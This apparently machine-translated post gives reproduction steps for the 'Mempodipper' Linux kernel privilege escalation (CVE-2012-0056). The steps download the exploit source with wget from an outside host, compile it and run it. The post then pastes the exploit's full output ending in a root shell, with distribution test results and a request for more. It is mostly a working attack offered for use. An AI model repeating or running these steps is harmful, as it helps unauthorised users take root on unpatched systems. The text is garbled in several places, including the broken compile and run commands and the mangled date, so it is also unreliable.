The privilege escalation vulnerability in Linux 2.6.39 to 3.2.0 allows common users to obtain the root permission by running specific code.
Reproduction method:
Wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Cc mempodipper. c
./A. out
Run whoami to check whether the execution is successful.
Known releases:
- Debian Wheezy Testing: Successful. Kernel 3.1.0-1-amd64. Debian Security Tracker Report
- Fedora 16: failed. Kernel 3.2.1-3. fc16.x86 _ 64
- Arch Linux: failed. Kernel 3.2.2-1-ARCH
If you have tested it, please tell us the test result! Note that the release and uname-a results are displayed.
My machine is successfully tested.
====================================
= Mempodipper =
= By zx2c4 =
= January 21,201 2 =
====================================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscils.
[+] Ptrace_traceme 'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem/proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Partitioned ed fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# Whoami
Root
Ubuntu11.10
Linux desktop 3.0.0-14-generic # 23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux